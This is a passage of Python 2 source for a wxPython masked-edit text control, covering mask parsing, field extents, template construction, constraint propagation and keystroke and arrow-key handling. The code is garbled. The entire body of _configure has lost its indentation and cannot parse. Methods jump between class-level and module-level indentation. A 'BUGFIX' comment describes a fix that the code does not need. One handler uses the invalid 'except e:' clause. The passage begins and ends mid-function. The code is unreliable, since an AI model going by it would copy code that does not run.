        explicit_field_boundaries = []
        i = 0
        while i < len(s):
            if s[i] == '\\':            # if escaped character:
                ismasked[i] = False     #  mark position as not a mask char
                if i+1 < len(s):        #  if another char follows...
                    s = s[:i] + s[i+1:]     #   elide the '\'
                    if i+2 < len(s) and s[i+1] == '\\':
                        # if next char also a '\', char is a literal '\'
                        s = s[:i] + s[i+1:]     #   elide the 2nd '\' as well
                i += 1                  #  increment to next char
            elif s[i] == '|':
                s = s[:i] + s[i+1:]     # elide the '|'
                explicit_field_boundaries.append(i)
                # keep index where it is:
            else:                       # else if special char, mark position accordingly
                ismasked[i] = s[i] in maskchars
####                dbg('ismasked[%d]:' % i, ismasked[i], s)
                i += 1                  #  increment to next char
####        dbg('ismasked:', ismasked)
##        dbg('new mask: "%s"' % s, indent=0)
        return s, ismasked, explicit_field_boundaries
    def _calcFieldExtents(self):
        """
        Subroutine responsible for establishing/configuring field instances with
        indices and editable extents appropriate to the specified mask, and building
        the lookup table mapping each position to the corresponding field.

        Populates self._lookupField (position -> field index), self.maskdict,
        and self._field_indices, creating Field instances in self._fields as
        needed.  Raises IndexError if an explicitly supplied field index has
        no corresponding extent in the mask.
        """
        self._lookupField = {}
        if self._mask:
            ## Create dictionary of positions,characters in mask
            self.maskdict = {}
            for charnum in range( len( self._mask)):
                self.maskdict[charnum] = self._mask[charnum:charnum+1]
            # For the current mask, create an ordered list of field extents
            # and a dictionary of positions that map to field indices:
            # (position 0 is reserved for the sign when signs are allowed)
            if self._signOk: start = 1
            else: start = 0
            if self._isFloat:
                # Skip field "discovery", and just construct a 2-field control with appropriate
                # constraints for a floating-point entry.
                # .setdefault always constructs 2nd argument even if not needed, so we do this
                # the old-fashioned way...
                if not self._fields.has_key(0):
                    self._fields[0] = Field()
                if not self._fields.has_key(1):
                    self._fields[1] = Field()
                self._decimalpos = string.find( self._mask, '.')
##                dbg('decimal pos =', self._decimalpos)
                # integer part of a float is right-aligned ('R'):
                formatcodes = self._fields[0]._GetParameter('formatcodes')
                if 'R' not in formatcodes: formatcodes += 'R'
                self._fields[0]._SetParameters(index=0, extent=(start, self._decimalpos),
                                               mask=self._mask[start:self._decimalpos], formatcodes=formatcodes)
                end = len(self._mask)
                if self._signOk and self._useParens:
                    end -= 1
                self._fields[1]._SetParameters(index=1, extent=(self._decimalpos+1, end),
                                               mask=self._mask[self._decimalpos+1:end])
                for i in range(self._decimalpos+1):
                    self._lookupField[i] = 0
                for i in range(self._decimalpos+1, len(self._mask)+1):
                    self._lookupField[i] = 1
            elif self._isInt:
                # Skip field "discovery", and just construct a 1-field control with appropriate
                # constraints for a integer entry.
                if not self._fields.has_key(0):
                    self._fields[0] = Field(index=0)
                end = len(self._mask)
                if self._signOk and self._useParens:
                    end -= 1
                self._fields[0]._SetParameters(index=0, extent=(start, end),
                                               mask=self._mask[start:end])
                for i in range(len(self._mask)+1):
                    self._lookupField[i] = 0
            else:
                # generic control; parse mask to figure out where the fields are:
                field_index = 0
                pos = 0
                i = self._findNextEntry(pos,adjustInsert=False)  # go to 1st entry point:
                if i < len(self._mask):   # no editable chars!
                    for j in range(pos, i+1):
                        self._lookupField[j] = field_index
                    pos = i       # figure out field for 1st editable space:
                while i <= len(self._mask):
####                    dbg('searching: outer field loop: i = ', i)
                    if self._isMaskChar(i):
####                        dbg('1st char is mask char; recording edit_start=', i)
                        edit_start = i
                        # Skip to end of editable part of current field:
                        while i < len(self._mask) and self._isMaskChar(i):
                            self._lookupField[i] = field_index
                            i += 1
                            if i in self._explicit_field_boundaries:
                                break
####                        dbg('edit_end =', i)
                        edit_end = i
                        self._lookupField[i] = field_index
####                        dbg('self._fields.has_key(%d)?' % field_index, self._fields.has_key(field_index))
                        if not self._fields.has_key(field_index):
                            kwargs = Field.valid_params.copy()
                            kwargs['index'] = field_index
                            kwargs['extent'] = (edit_start, edit_end)
                            kwargs['mask'] = self._mask[edit_start:edit_end]
                            self._fields[field_index] = Field(**kwargs)
                        else:
                            self._fields[field_index]._SetParameters(
                                index=field_index,
                                extent=(edit_start, edit_end),
                                mask=self._mask[edit_start:edit_end])
                    pos = i
                    i = self._findNextEntry(pos, adjustInsert=False)  # go to next field:
####                    dbg('next entry:', i)
                    if i > pos:
                        # intervening literal positions belong to the previous field:
                        for j in range(pos, i+1):
                            self._lookupField[j] = field_index
                    if i >= len(self._mask):
                        break           # if past end, we're done
                    else:
                        field_index += 1
####                        dbg('next field:', field_index)
            # _field_indices excludes the control-level pseudo-field at -1:
            indices = self._fields.keys()
            indices.sort()
            self._field_indices = indices[1:]
####            dbg('lookupField map:', indent=1)
##            for i in range(len(self._mask)):
####                dbg('pos %d:' % i, self._lookupField[i])
####            dbg(indent=0)
            # Verify that all field indices specified are valid for mask:
            for index in self._fields.keys():
                if index not in [-1] + self._lookupField.values():
                    ie = IndexError('field %d is not a valid field for mask "%s"' % (index, self._mask))
                    ie.index = index
                    raise ie
    def _calcTemplate(self, reset_fillchar, reset_default):
        """
        Subroutine for processing current fillchars and default values for
        whole control and individual fields, constructing the resulting
        overall template, and adjusting the current value as necessary.

        reset_fillchar  boolean: ignore per-field fill characters and use the
                        control-level one.
        reset_default   boolean: ignore per-field default values.

        Raises ValueError if the resulting default value is not valid for
        the control.
        """
        default_set = False
        if self._ctrl_constraints._defaultValue:
            default_set = True
        else:
            for field in self._fields.values():
                if field._defaultValue and not reset_default:
                    default_set = True
##        dbg('default set?', default_set)
        # Determine overall new template for control, and keep track of previous
        # values, so that current control value can be modified as appropriate:
        if self.controlInitialized: curvalue = list(self._GetValue())
        else:                       curvalue = None
        if hasattr(self, '_fillChar'): old_fillchars = self._fillChar
        else:                          old_fillchars = None
        if hasattr(self, '_template'): old_template = self._template
        else:                          old_template = None
        self._template = ""
        self._fillChar = {}
        reset_value = False
        for field in self._fields.values():
            field._template = ""
        # Build the template one mask position at a time:
        for pos in range(len(self._mask)):
####            dbg('pos:', pos)
            field = self._FindField(pos)
####            dbg('field:', field._index)
            start, end = field._extent
            if pos == 0 and self._signOk:
                self._template = ' ' # always make 1st position blank, regardless of fillchar
            elif self._isFloat and pos == self._decimalpos:
                self._template += self._decimalChar
            elif self._isMaskChar(pos):
                if field._fillChar != self._ctrl_constraints._fillChar and not reset_fillchar:
                    fillChar = field._fillChar
                else:
                    fillChar = self._ctrl_constraints._fillChar
                self._fillChar[pos] = fillChar
                # Replace any current old fillchar with new one in current value;
                # if action required, set reset_value flag so we can take that action
                # after we're all done
                if self.controlInitialized and old_fillchars and old_fillchars.has_key(pos) and curvalue:
                    if curvalue[pos] == old_fillchars[pos] and old_fillchars[pos] != fillChar:
                        reset_value = True
                        curvalue[pos] = fillChar
                if not field._defaultValue and not self._ctrl_constraints._defaultValue:
####                    dbg('no default value')
                    self._template += fillChar
                    field._template += fillChar
                elif field._defaultValue and not reset_default:
####                    dbg('len(field._defaultValue):', len(field._defaultValue))
####                    dbg('pos-start:', pos-start)
                    if len(field._defaultValue) > pos-start:
####                        dbg('field._defaultValue[pos-start]: "%s"' % field._defaultValue[pos-start])
                        self._template += field._defaultValue[pos-start]
                        field._template += field._defaultValue[pos-start]
                    else:
####                        dbg('field default not long enough; using fillChar')
                        self._template += fillChar
                        field._template += fillChar
                else:
                    if len(self._ctrl_constraints._defaultValue) > pos:
####                        dbg('using control default')
                        self._template += self._ctrl_constraints._defaultValue[pos]
                        field._template += self._ctrl_constraints._defaultValue[pos]
                    else:
####                        dbg('ctrl default not long enough; using fillChar')
                        self._template += fillChar
                        field._template += fillChar
####                dbg('field[%d]._template now "%s"' % (field._index, field._template))
####                dbg('self._template now "%s"' % self._template)
            else:
                # literal mask character; copied verbatim into the template:
                self._template += self._mask[pos]
        self._fields[-1]._template = self._template     # (for consistency)
        if curvalue:    # had an old value, put new one back together
            newvalue = string.join(curvalue, "")
        else:
            newvalue = None
        if default_set:
            self._defaultValue = self._template
##            dbg('self._defaultValue:', self._defaultValue)
            if not self.IsEmpty(self._defaultValue) and not self.IsValid(self._defaultValue):
####                dbg(indent=0)
                ve = ValueError('Default value of "%s" is not a valid value for control "%s"' % (self._defaultValue, self.name))
                ve.value = self._defaultValue
                raise ve
            # if no fillchar change, but old value == old template, replace it:
            if newvalue == old_template:
                newvalue = self._template
                reset_value = True
        else:
            self._defaultValue = None
        if reset_value:
##            dbg('resetting value to: "%s"' % newvalue)
            # preserve caret and selection across the value reset:
            pos = self._GetInsertionPoint()
            sel_start, sel_to = self._GetSelection()
            self._SetValue(newvalue)
            self._SetInsertionPoint(pos)
            self._SetSelection(sel_start, sel_to)
    def _propagateConstraints(self, **reset_args):
        """
        Subroutine for propagating changes to control-level constraints and
        formatting to the individual fields as appropriate.

        reset_args maps parameter names to booleans indicating which
        control-level parameters were changed and should therefore be
        re-propagated to the fields.
        """
        parent_codes = self._ctrl_constraints._formatcodes
        parent_includes = self._ctrl_constraints._includeChars
        parent_excludes = self._ctrl_constraints._excludeChars
        for i in self._field_indices:
            field = self._fields[i]
            inherit_args = {}
            if len(self._field_indices) == 1:
                # single-field control: field simply mirrors the control:
                inherit_args['formatcodes'] = parent_codes
                inherit_args['includeChars'] = parent_includes
                inherit_args['excludeChars'] = parent_excludes
            else:
                # multi-field control: merge control-level chars/codes into
                # each field's own, only recording a change when one occurred:
                field_codes = current_codes = field._GetParameter('formatcodes')
                for c in parent_codes:
                    if c not in field_codes: field_codes += c
                if field_codes != current_codes:
                    inherit_args['formatcodes'] = field_codes
                include_chars = current_includes = field._GetParameter('includeChars')
                for c in parent_includes:
                    if not c in include_chars: include_chars += c
                if include_chars != current_includes:
                    inherit_args['includeChars'] = include_chars
                exclude_chars = current_excludes = field._GetParameter('excludeChars')
                for c in parent_excludes:
                    if not c in exclude_chars: exclude_chars += c
                if exclude_chars != current_excludes:
                    inherit_args['excludeChars'] = exclude_chars
            if reset_args.has_key('defaultValue') and reset_args['defaultValue']:
                inherit_args['defaultValue'] = ""   # (reset for field)
            for param in Field.propagating_params:
####                dbg('reset_args.has_key(%s)?' % param, reset_args.has_key(param))
####                dbg('reset_args.has_key(%(param)s) and reset_args[%(param)s]?' % locals(), reset_args.has_key(param) and reset_args[param])
                if reset_args.has_key(param):
                    inherit_args[param] = self.GetCtrlParameter(param)
####                    dbg('inherit_args[%s]' % param, inherit_args[param])
            if inherit_args:
                field._SetParameters(**inherit_args)
                field._ValidateParameters(**inherit_args)
def _validateChoices(self):
    """
    Validate the choice lists supplied for the fields: every choice must
    be a legal "paste" into its field and must fit within the field's
    extent.

    Raises ValueError for any offending choice; the exception carries
    .value (the choice) and .index (the field index) for the caller.
    """
    for field in self._fields.values():
        if not field._choices:
            continue
        index = field._index
        if (len(self._field_indices) == 1 and index == 0
                and field._choices == self._ctrl_constraints._choices):
            # Field 0 of a single-field control shares the control-level
            # choice list, which has already been validated; skip the
            # duplicate check.
            continue
        start, end = field._extent
        for choice in field._choices:
            # Simulate pasting the choice into the field's extent:
            valid_paste, ignore, replace_to = self._validatePaste(choice, start, end)
            if not valid_paste:
                ve = ValueError('"%s" could not be entered into field %d of control "%s"' % (choice, index, self.name))
                ve.value = choice
                ve.index = index
                raise ve
            elif replace_to > end:
                # BUGFIX: the '%' operator was missing here, so this line
                # raised TypeError (calling a str) instead of the intended
                # ValueError.
                ve = ValueError('"%s" will not fit into field %d of control "%s"' % (choice, index, self.name))
                ve.value = choice
                ve.index = index
                raise ve
def _configure(self, mask, **reset_args):
"""
This function sets flags for automatic styling options. It is
called whenever a control or field-level parameter is set/changed.
This routine does the bulk of the interdependent parameter processing, determining
the field extents of the mask if changed, resetting parameters as appropriate,
determining the overall template value for the control, etc.
reset_args is supplied if called from control's .SetCtrlParameters()
routine, and indicates which if any parameters which can be
overridden by individual fields have been reset by request for the
whole control.
"""
## dbg(suspend=1)
## dbg('MaskedEditMixin::_configure("%s")' % mask, indent=1)
# Preprocess specified mask to expand {n} syntax, handle escaped
# mask characters, etc and build the resulting positionally keyed
# dictionary for which positions are mask vs. template characters:
self._mask, self._ismasked, self._explicit_field_boundaries = self._processMask(mask)
self._masklength = len(self._mask)
#### dbg('processed mask:', self._mask)
# Preserve original mask specified, for subsequent reprocessing
# if parameters change.
## dbg('mask: "%s"' % self._mask, 'previous mask: "%s"' % self._previous_mask)
self._previous_mask = mask # save unexpanded mask for next time
# Set expanded mask and extent of field -1 to width of entire control:
self._ctrl_constraints._SetParameters(mask = self._mask, extent=(0,self._masklength))
# Go parse mask to determine where each field is, construct field
# instances as necessary, configure them with those extents, and
# build lookup table mapping each position for control to its corresponding
# field.
#### dbg('calculating field extents')
self._calcFieldExtents()
# Go process defaultValues and fillchars to construct the overall
# template, and adjust the current value as necessary:
reset_fillchar = reset_args.has_key('fillChar') and reset_args['fillChar']
reset_default = reset_args.has_key('defaultValue') and reset_args['defaultValue']
#### dbg('calculating template')
self._calcTemplate(reset_fillchar, reset_default)
# Propagate control-level formatting and character constraints to each
# field if they don't already have them; if only one field, propagate
# control-level validation constraints to field as well:
#### dbg('propagating constraints')
self._propagateConstraints(**reset_args)
if self._isFloat and self._fields[0]._groupChar == self._decimalChar:
raise AttributeError('groupChar (%s) and decimalChar (%s) must be distinct.' %
(self._fields[0]._groupChar, self._decimalChar) )
#### dbg('fields:', indent=1)
## for i in [-1] + self._field_indices:
#### dbg('field %d:' % i, self._fields[i].__dict__)
#### dbg(indent=0)
# Set up special parameters for numeric control, if appropriate:
if self._signOk:
self._signpos = 0 # assume it starts here, but it will move around on floats
signkeys = ['-', '+', ' ']
if self._useParens:
signkeys += ['(', ')']
for key in signkeys:
keycode = ord(key)
if not self._keyhandlers.has_key(keycode):
self._SetKeyHandler(key, self._OnChangeSign)
elif self._isInt or self._isFloat:
signkeys = ['-', '+', ' ', '(', ')']
for key in signkeys:
keycode = ord(key)
if self._keyhandlers.has_key(keycode) and self._keyhandlers[keycode] == self._OnChangeSign:
self._SetKeyHandler(key, None)
if self._isFloat or self._isInt:
if self.controlInitialized:
value = self._GetValue()
#### dbg('value: "%s"' % value, 'len(value):', len(value),
## 'len(self._ctrl_constraints._mask):',len(self._ctrl_constraints._mask))
if len(value) < len(self._ctrl_constraints._mask):
newvalue = value
if self._useParens and len(newvalue) < len(self._ctrl_constraints._mask) and newvalue.find('(') == -1:
newvalue += ' '
if self._signOk and len(newvalue) < len(self._ctrl_constraints._mask) and newvalue.find(')') == -1:
newvalue = ' ' + newvalue
if len(newvalue) < len(self._ctrl_constraints._mask):
if self._ctrl_constraints._alignRight:
newvalue = newvalue.rjust(len(self._ctrl_constraints._mask))
else:
newvalue = newvalue.ljust(len(self._ctrl_constraints._mask))
## dbg('old value: "%s"' % value)
## dbg('new value: "%s"' % newvalue)
try:
self._ChangeValue(newvalue)
except Exception, e:
## dbg('exception raised:', e, 'resetting to initial value')
self._SetInitialValue()
elif len(value) > len(self._ctrl_constraints._mask):
newvalue = value
if not self._useParens and newvalue[-1] == ' ':
newvalue = newvalue[:-1]
if not self._signOk and len(newvalue) > len(self._ctrl_constraints._mask):
newvalue = newvalue[1:]
if not self._signOk:
newvalue, signpos, right_signpos = self._getSignedValue(newvalue)
## dbg('old value: "%s"' % value)
## dbg('new value: "%s"' % newvalue)
try:
self._ChangeValue(newvalue)
except Exception, e:
## dbg('exception raised:', e, 'resetting to initial value')
self._SetInitialValue()
elif not self._signOk and ('(' in value or '-' in value):
newvalue, signpos, right_signpos = self._getSignedValue(value)
## dbg('old value: "%s"' % value)
## dbg('new value: "%s"' % newvalue)
try:
self._ChangeValue(newvalue)
except e:
## dbg('exception raised:', e, 'resetting to initial value')
self._SetInitialValue()
# Replace up/down arrow default handling:
# make down act like tab, up act like shift-tab:
#### dbg('Registering numeric navigation and control handlers (if not already set)')
if not self._keyhandlers.has_key(wx.WXK_DOWN):
self._SetKeycodeHandler(wx.WXK_DOWN, self._OnChangeField)
if not self._keyhandlers.has_key(wx.WXK_NUMPAD_DOWN):
self._SetKeycodeHandler(wx.WXK_DOWN, self._OnChangeField)
if not self._keyhandlers.has_key(wx.WXK_UP):
self._SetKeycodeHandler(wx.WXK_UP, self._OnUpNumeric) # (adds "shift" to up arrow, and calls _OnChangeField)
if not self._keyhandlers.has_key(wx.WXK_NUMPAD_UP):
self._SetKeycodeHandler(wx.WXK_UP, self._OnUpNumeric) # (adds "shift" to up arrow, and calls _OnChangeField)
# On ., truncate contents right of cursor to decimal point (if any)
# leaves cursor after decimal point if floating point, otherwise at 0.
if not self._keyhandlers.has_key(ord(self._decimalChar)) or self._keyhandlers[ord(self._decimalChar)] != self._OnDecimalPoint:
self._SetKeyHandler(self._decimalChar, self._OnDecimalPoint)
if not self._keyhandlers.has_key(ord(self._shiftDecimalChar)) or self._keyhandlers[ord(self._shiftDecimalChar)] != self._OnChangeField:
self._SetKeyHandler(self._shiftDecimalChar, self._OnChangeField) # (Shift-'.' == '>' on US keyboards)
# Allow selective insert of groupchar in numbers:
if not self._keyhandlers.has_key(ord(self._fields[0]._groupChar)) or self._keyhandlers[ord(self._fields[0]._groupChar)] != self._OnGroupChar:
self._SetKeyHandler(self._fields[0]._groupChar, self._OnGroupChar)
## dbg(indent=0, suspend=0)
def _SetInitialValue(self, value=""):
    """
    Fill the control with the supplied value, or with the generated
    template when no value is given, then (re)apply formatting.

    The template path uses the "raw" setters because the template may not
    coincide with a "legal" value, so external validation rules must be
    bypassed; an explicit value goes through the public, validating
    setters instead.
    """
    use_raw = not value
    if use_raw:
        value = self._template
    self._prevValue = self._curValue = value

    try:
        if isinstance(self, wx.TextCtrl):
            setter = self._ChangeValue if use_raw else self.ChangeValue
        else:
            setter = self._SetValue if use_raw else self.SetValue
        setter(value)
    except Exception:
        raise

    # Set value/type-specific formatting
    self._applyFormatting()
def _calcSize(self, size=None):
    """
    Compute an automatic size for the control from the mask length, when
    autofitting is enabled and no explicit size was supplied; must be
    called after the base control is instantiated.
    """
    if (size is None or size == wx.DefaultSize) and self._autofit:
        sample = 'M' * self._masklength
        if wx.Platform != "__WXMSW__":
            sample += 'M'       # non-MSW platforms need a little extra space
        if wx.Platform == "__WXMAC__":
            sample += 'M'       # and the Mac a little more still
        width = self.GetTextExtent(sample)[0]
        size = (width + 4, self.GetSize().height)
    return size
def _setFont(self):
    """
    Set the control's font: the system default GUI font normally, or a
    teletype (fixed-width) font of the same size/style/weight when a
    fixed-width font was requested.
    """
    if self._useFixedWidthFont:
        current = self.GetFont()    # preserve size, weight, style, underline
        points = current.GetPointSize()
        if 'wxMac' in wx.PlatformInfo \
           and self.GetWindowVariant() == wx.WINDOW_VARIANT_MINI:
            points -= 1             # mini variant renders a point smaller on Mac
        # wx.TELETYPE is guaranteed to be mappable on all wxWindows platforms:
        self._font = wx.Font(points, wx.TELETYPE, current.GetStyle(),
                             current.GetWeight(), current.GetUnderlined())
    else:
        self._font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
    self.SetFont(self._font)
def _OnTextChange(self, event):
    """
    Handler for EVT_TEXT events.  Returns True if the event was a
    legitimate text change, False for a "bogus" one.

    (wx.TextCtrl.SetValue can generate duplicate EVT_TEXT events for a
    single change; on some platforms -- e.g. linux/GTK -- the first of
    the pair carries an empty value.  Comparing against the last value
    seen is the only mechanism found that masks this.)

    self._Change() is a hook for subclasses and may return False to skip
    the logic in this method.
    """
    newvalue = self._GetValue()
    if self._ignoreChange:
        # an "intermediate" change we triggered ourselves; ignore it
        return False

    if not newvalue or newvalue == self._curValue:
        # duplicate / bogus event; nothing to do
        return False

    handled = False
    if self._Change():
        if (self._signOk and self._isNeg
                and newvalue.find('-') == -1 and newvalue.find('(') == -1):
            # sign characters have vanished from the text; clear the flag
            # and recompute the sign positions:
            self._isNeg = False
            text, self._signpos, self._right_signpos = self._getSignedValue()
        self._CheckValid()      # recolor control as appropriate
        event.Skip()
        handled = True

    self._prevValue = self._curValue    # save for undo
    self._curValue = newvalue           # last value seen, for next iteration
    return handled
def _OnKeyDown(self, event):
    """
    EVT_KEY_DOWN handler: captures Ctrl-modified navigation keys (e.g.
    Ctrl-tab) that never reach the "cooked" EVT_CHAR handler and routes
    them to _OnChar now; every other key falls through to normal EVT_CHAR
    processing.
    """
    keycode = event.GetKeyCode()
    if event.ControlDown() and keycode in self._nav:
        # this is likely the only place we will see these events;
        # process them immediately:
        self._OnChar(event)
    else:
        # allow regular EVT_CHAR key processing
        event.Skip()
def _OnChar(self, event):
    """
    This is the engine of MaskedEdit controls.  It examines each keystroke,
    decides if it's allowed, where it should go or what action to take.

    Processing order: subclass _Keypress() hook, navigation/control keys,
    registered per-key override handlers, then mask-driven insertion of the
    (possibly unicode-decoded) character, with float/date-specific value
    adjustment and deferred (wx.CallAfter) cursor/selection updates.
    """
    # Get keypress value, adjusted by control options (e.g. convert to upper etc)
    key = event.GetKeyCode()
    orig_pos = self._GetInsertionPoint()
    orig_value = self._GetValue()

    # subclass hook; returning False vetoes all processing of this key:
    if not self._Keypress(key):
        return

    # If no format string for this control, or the control is marked as
    # "read-only", skip the rest of the special processing, and just
    # "do the standard thing:"
    if not self._mask or not self._IsEditable():
        event.Skip()
        return

    # Process navigation and control keys first, with
    # position/selection unadulterated:
    if key in self._nav + self._control:
        if self._keyhandlers.has_key(key):
            keep_processing = self._keyhandlers[key](event)
            if self._GetValue() != orig_value:
                self.modified = True
            if not keep_processing:
                return
        self._applyFormatting()
        return

    # Else... adjust the position as necessary for next input key,
    # and determine resulting selection:
    pos = self._adjustPos( orig_pos, key )    ## get insertion position, adjusted as needed
    sel_start, sel_to = self._GetSelection()  ## check for a range of selected text

    keep_processing = True
    # Capture user past end of format field
    # NOTE(review): compares against len(self.maskdict); presumably the
    # per-position mask dictionary built by _processMask -- confirm.
    if pos > len(self.maskdict):
        keep_processing = False

    key = self._adjustKey(pos, key)    # apply formatting constraints to key:

    if self._keyhandlers.has_key(key):
        # there's an override for default behavior; use override function instead
        keep_processing = self._keyhandlers[key](event)
        if self._GetValue() != orig_value:
            self.modified = True
        if not keep_processing:
            return
        # else skip default processing, but do final formatting

    if key in wx_control_keycodes:
        # non-printable; let base control handle it
        event.Skip()
        keep_processing = False
    else:
        field = self._FindField(pos)

        if 'unicode' in wx.PlatformInfo:
            # decode the keystroke and the exclusion sets into unicode so
            # the membership test below compares like with like:
            if key < 256:
                char = chr(key)    # (must work if we got this far)
                char = char.decode(self._defaultEncoding)
            else:
                char = unichr(event.GetUnicodeKey())
            excludes = u''
            if type(field._excludeChars) != types.UnicodeType:
                excludes += field._excludeChars.decode(self._defaultEncoding)
            # NOTE(review): this tests the type of the constraints object
            # itself, not its _excludeChars attribute -- looks like a
            # latent inconsistency with the line above; confirm upstream.
            if type(self._ctrl_constraints) != types.UnicodeType:
                excludes += self._ctrl_constraints._excludeChars.decode(self._defaultEncoding)
        else:
            char = chr(key)    # (must work if we got this far)
            excludes = field._excludeChars + self._ctrl_constraints._excludeChars

        if chr(key) == ' ':
            pass

        if char in excludes:
            keep_processing = False

        if keep_processing and self._isCharAllowed( char, pos, checkRegex = True ):
            # insert key into candidate new value, but don't change control yet:
            oldstr = self._GetValue()
            newstr, newpos, new_select_to, match_field, match_index = self._insertKey(
                char, pos, sel_start, sel_to, self._GetValue(), allowAutoSelect = True)

            if self._ctrl_constraints._validRequired and not self.IsValid(newstr):
                # not valid as-is; a float may become valid after
                # normalization, so try that before rejecting:
                keep_processing = False
                if self._isFloat and newstr != self._template:
                    newstr = self._adjustFloat(newstr)
                    if self.IsValid(newstr):
                        keep_processing = True
                        wx.CallAfter(self._SetInsertionPoint, self._decimalpos)
                if not keep_processing:
                    # key disallowed by validation
                    if not wx.Validator_IsSilent() and orig_pos == pos:
                        wx.Bell()

            if keep_processing:
                unadjusted = newstr

                # special case: adjust date value as necessary:
                if self._isDate and newstr != self._template:
                    newstr = self._adjustDate(newstr)
                if newstr != orig_value:
                    self.modified = True

                wx.CallAfter(self._SetValue, newstr)

                # Adjust insertion point on date if just entered 2 digit year,
                # and there are now 4 digits:
                if not self.IsDefault() and self._isDate and self._4digityear:
                    year2dig = self._dateExtent - 2
                    if pos == year2dig and unadjusted[year2dig] != newstr[year2dig]:
                        newpos = pos+2

                wx.CallAfter(self._SetInsertionPoint, newpos)

                if match_field is not None:
                    # the keystroke narrowed the choices to a single match:
                    self._OnAutoSelect(match_field, match_index)

                if new_select_to != newpos:
                    wx.CallAfter(self._SetSelection, newpos, new_select_to)
                else:
                    # entering a new field that wants select-on-entry?
                    newfield = self._FindField(newpos)
                    if newfield != field and newfield._selectOnFieldEntry:
                        wx.CallAfter(self._SetInsertionPoint, newfield._extent[0])
                        wx.CallAfter(self._SetSelection, newfield._extent[0], newfield._extent[1])
                    else:
                        wx.CallAfter(self._SetSelection, newpos, new_select_to)
                keep_processing = False
        elif keep_processing:
            # char not allowed
            keep_processing = False
            if (not wx.Validator_IsSilent()) and orig_pos == pos:
                wx.Bell()

    self._applyFormatting()

    # Move to next insertion point
    if keep_processing and key not in self._nav:
        pos = self._GetInsertionPoint()
        next_entry = self._findNextEntry( pos )
        if pos != next_entry:
            wx.CallAfter(self._SetInsertionPoint, next_entry )

        if self._isTemplateChar(pos):
            self._AdjustField(pos)
def _FindFieldExtent(self, pos=None, getslice=False, value=None):
    """
    Return the editable (start, end) extent of the field containing
    position pos; with getslice=True, also return the corresponding
    substring of the control's value (or of the supplied value).

    Template chars are bound to the preceding field, and leading template
    chars are ignored when determining the current field.  E.g. with
    template (###) ###-####, positions 0-5 all map to extent (1, 4),
    position 6 to (6, 9), position 10 to (10, 14), etc.
    """
    field = self._FindField(pos)
    if not field:
        return (None, None, "") if getslice else (None, None)

    edit_start, edit_end = field._extent
    if not getslice:
        return edit_start, edit_end

    if value is None:
        value = self._GetValue()
    return edit_start, edit_end, value[edit_start:edit_end]
def _FindField(self, pos=None):
    """
    Return the field instance containing position pos (default: the
    current insertion point).  Template chars are bound to the preceding
    field; leading template chars are ignored.  Raises IndexError for a
    position outside the control; returns None if the control has no
    fields.
    """
    if pos is None:
        pos = self._GetInsertionPoint()
    elif not (0 <= pos <= self._masklength):
        raise IndexError('position %s out of range of control' % str(pos))

    if not self._fields:
        return None
    return self._fields[self._lookupField[pos]]
def ClearValue(self):
    """
    Reset the control to its default (template) value via the validating
    setter, move the cursor to the start, and repaint.
    """
    self._SetValue(self._template)
    self._SetInsertionPoint(0)
    self.Refresh()
def ClearValueAlt(self):
    """
    Reset the control to its default (template) value without firing a
    change event (uses the ChangeValue path), move the cursor to the
    start, and repaint.
    """
    self._ChangeValue(self._template)
    self._SetInsertionPoint(0)
    self.Refresh()
def _baseCtrlEventHandler(self, event):
    """
    Hand the key straight to the base control and stop masked-edit
    processing (always returns False).
    """
    event.Skip()
    return False
def _OnUpNumeric(self, event):
    """
    Make the up arrow act like shift-tab: force the shift modifier onto
    the event and delegate to _OnChangeField, which then moves to the
    start of the previous field.
    """
    event.m_shiftDown = 1
    self._OnChangeField(event)
def _OnArrow(self, event):
    """
    Used in response to left/right navigation keys; makes these actions
    skip over mask template chars, optionally converting shifted up/down
    into tab / reverse-tab field changes, and honoring select-on-entry
    fields.
    """
    pos = self._GetInsertionPoint()
    keycode = event.GetKeyCode()
    sel_start, sel_to = self._GetSelection()
    entry_end = self._goEnd(getPosOnly=True)

    # First, normalize the field under the cursor for the direction moved:
    if keycode in (wx.WXK_RIGHT, wx.WXK_DOWN, wx.WXK_NUMPAD_RIGHT, wx.WXK_NUMPAD_DOWN):
        if( ( not self._isTemplateChar(pos) and pos+1 > entry_end)
            or ( self._isTemplateChar(pos) and pos >= entry_end) ):
            # can't advance past the end of current input
            return False
        elif self._isTemplateChar(pos):
            self._AdjustField(pos)
    elif keycode in (wx.WXK_LEFT, wx.WXK_UP, wx.WXK_NUMPAD_LEFT, wx.WXK_NUMPAD_UP) and sel_start == sel_to and pos > 0 and self._isTemplateChar(pos-1):
        # moving left across a template char: adjust the field being left
        self._AdjustField(pos)

    # treat as shifted up/down arrows as tab/reverse tab:
    if event.ShiftDown() and keycode in (wx.WXK_UP, wx.WXK_DOWN, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN):
        # remove "shifting" and treat as (forward) tab:
        event.m_shiftDown = False
        keep_processing = self._OnChangeField(event)

    elif self._FindField(pos)._selectOnFieldEntry:
        if( keycode in (wx.WXK_UP, wx.WXK_LEFT, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_LEFT)
            and sel_start != 0
            and self._isTemplateChar(sel_start-1)
            and sel_start != self._masklength
            and not self._signOk and not self._useParens):
            # call _OnChangeField to handle "ctrl-shifted event"
            # (which moves to previous field and selects it.)
            event.m_shiftDown = True
            event.m_ControlDown = True
            keep_processing = self._OnChangeField(event)
        elif( keycode in (wx.WXK_DOWN, wx.WXK_RIGHT, wx.WXK_NUMPAD_DOWN, wx.WXK_NUMPAD_RIGHT)
              and sel_to != self._masklength
              and self._isTemplateChar(sel_to)):
            # when changing field to the right, ensure don't accidentally go left instead
            event.m_shiftDown = False
            keep_processing = self._OnChangeField(event)
        else:
            # treat arrows as normal, allowing selection
            # as appropriate:
            event.Skip()
    else:
        if( (sel_to == self._fields[0]._extent[0] and keycode in (wx.WXK_LEFT, wx.WXK_NUMPAD_LEFT) )
            or (sel_to == self._masklength and keycode in (wx.WXK_RIGHT, wx.WXK_NUMPAD_RIGHT) ) ):
            # at the control's edge; signal rather than move
            if not wx.Validator_IsSilent():
                wx.Bell()
        else:
            # treat arrows as normal, allowing selection
            # as appropriate:
            event.Skip()

    # NOTE(review): this unconditional reset makes the earlier
    # keep_processing assignments dead -- the method always returns
    # False.  Looks intentional (all real work was queued above), but
    # confirm before relying on the return value.
    keep_processing = False
    return keep_processing
def _OnCtrl_S(self, event):
""" Default Ctrl-S handler; prints value information if demo enabled. """
